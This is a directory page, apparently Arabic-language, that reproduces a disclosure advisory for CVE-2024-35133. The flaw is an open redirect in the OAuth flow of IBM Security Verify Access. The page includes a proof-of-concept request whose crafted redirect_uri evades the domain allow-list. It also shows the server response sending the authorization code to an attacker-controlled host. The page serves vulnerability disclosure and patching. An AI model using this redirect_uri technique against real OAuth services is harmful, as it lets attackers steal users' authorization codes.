Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — نشرة أمنية لـ CVE-2024-35133 - مع PoC | Kitploit
أدوات/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

نشرة أمنية لـ CVE-2024-35133 - مع PoC

عرض المستودع
23منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

IBM Security Verify Access - إعادة توجيه مفتوحة أثناء تدفق OAuth (CVE-2024-35133)

جدول المحتويات

  1. نظرة عامة
  2. وصف مفصل
  3. إثبات المفهوم
  4. الحل
  5. الجدول الزمني للإفصاح
  6. المراجع
  7. الإسناد
  8. إشعارات قانونية

نظرة عامة

المراجعة: 1.0
التأثير:
من خلال إقناع الضحية بزيارة موقع ويب مصمم خصيصًا، يمكن لمهاجم عن بُعد استغلال هذه الثغرة لتزوير عنوان URL المعروض وإعادة توجيه المستخدم إلى موقع ضار. قد يسمح هذا للمهاجم بالحصول على معلومات شديدة الحساسية أو شن هجمات إضافية ضد الضحية.

الخطورة:

  • NIST: عالية
  • IBM: متوسطة

درجة CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

البائع: IBM

المنتجات المتأثرة:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

الإصدارات المتأثرة: 10.0.0 - 10.0.8

وصف المنتج

IBM Security Verify Access هو حل متكامل لإدارة سياسات الأمان والتخويل للشبكات. يوفر حماية شاملة للموارد عبر شبكات الإنترانت والإكسترانت الموزعة جغرافيًا.

تشمل بعض الميزات الرئيسية:

  • المصادقة: مجموعة واسعة من أدوات المصادقة المضمنة ودعم أدوات المصادقة الخارجية.
  • التخويل: قرارات آمنة بالسماح أو الرفع لطلبات الموارد المحمية.
  • أمان البيانات وإدارة الموارد المركزية: يدير الوصول الآمن إلى موارد الشبكة الداخلية باستخدام اتصال الإنترنت العام عبر نظام جدار حماية للشركة.

وصف مفصل

أثناء اختبار اختراق لتدفق OAuth لدى عميل، تم اكتشاف ثغرة إعادة توجيه مفتوحة، مما يسمح بتسريب متغير "code" الخاص بـ OAuth.

من خلال تجاوز منطق المحلل المسؤول عن التحقق من معامل "redirect_uri" أثناء تدفق OAuth (باستغلال RFC 3986)، يمكن للمهاجم التلاعب بمرشح قائمة النطاقات المسموح بها في IBM Security Verify Access. أدى هذا إلى إعادة توجيه مفتوحة إلى أي نطاق عشوائي يتحكم فيه المهاجم. يمكن إعادة توجيه الضحية إلى موقع ضار بينما يبدو النطاق موثوقًا.

قد يؤدي هذا إلى كشف معلومات حساسة مثل رمز "code" الخاص بـ OAuth أو هجمات إضافية ضد الضحية.


إثبات المفهوم

الطلب

GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

الاستجابة

HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

الحل

راجع نشرة IBM الأمنية 7166712 للحصول على معلومات التصحيح أو الترقية أو الإجراء البديل المقترح.
انظر المراجع لمزيد من التفاصيل.


الجدول الزمني للإفصاح

  • 19/03/2024: اكتشاف الثغرة بواسطة باحث الأمان (Giulio Garzia)
  • 21/03/2024: مشاركة الثغرة مع العميل المستخدم لـ IBM Security Verify Access
  • 02/04/2024: الإبلاغ عن الثغرة لـ IBM
  • 14/05/2024: تأكيد IBM للثغرة
  • 18/07/2024: توفير تصحيح أولي من IBM للعميل
  • 27/08/2024: مشاركة النشرة الأمنية والثغرة بواسطة IBM

المراجع

  1. النشرة الأمنية لـ IBM CVE-2024-35133
  2. قاعدة بيانات نقاط الضعف لـ IBM X-Force
  3. NIST CVE-2024-35133
  4. CWE-178: معالجة غير صحيحة لعنوان URL

الإسناد

تم اكتشاف هذه الثغرة والإبلاغ عنها بواسطة:

  • Giulio Garzia
    LinkedIn
    GitHub

إشعارات قانونية

حقوق النشر (ج) 2024 Giulio Garzia "Ozozuz"

يُسمح بإعادة التوزيع الإلكتروني لهذا التنبيه. لا يجوز تحريره دون موافقة خطية صريحة. للحصول على إذن لإعادة طبع هذا التنبيه في وسائط أخرى، يرجى الاتصال بالمؤلف.

إخلاء المسؤولية: المعلومات الواردة في هذا الإشعار دقيقة في وقت النشر بناءً على البيانات المتاحة. لا يتم تقديم أي ضمانات. لا يتحمل المؤلف أو الناشر أي مسؤولية عن الأضرار المباشرة أو غير المباشرة أو التبعية الناشئة عن استخدام هذه المعلومات.

تنزيل الأداة